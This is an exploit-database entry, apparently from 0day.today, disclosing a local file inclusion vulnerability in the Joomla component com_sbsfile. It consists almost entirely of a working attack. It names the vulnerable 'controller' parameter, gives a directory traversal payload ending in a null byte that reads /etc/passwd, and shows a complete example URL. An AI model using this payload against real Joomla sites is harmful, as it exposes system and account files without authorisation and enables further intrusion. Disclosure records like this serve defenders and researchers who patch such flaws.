id: 9647
date: 03/13/2010
title: Joomla Component com_sbsfile Local File Inclusion Vulnerability
author: DevilZ TM
cves: 

===============================================================
Joomla Component com_sbsfile Local File Inclusion Vulnerability
===============================================================

[~]#########################################   ExploiT   #############################################[~]
  
[~] Vulnerable File :
  
http://127.0.0.1/index.php?option=com_sbsfile&controller=[LFI]
  
[~] ExploiT         :
  
../../../../../../../etc/passwd%00
  
[~] Example         :
  
http://127.0.0.1/index.php?option=com_sbsfile&controller=../../../../../../../etc/passwd%00



#  0day.today [2023-03-25]  #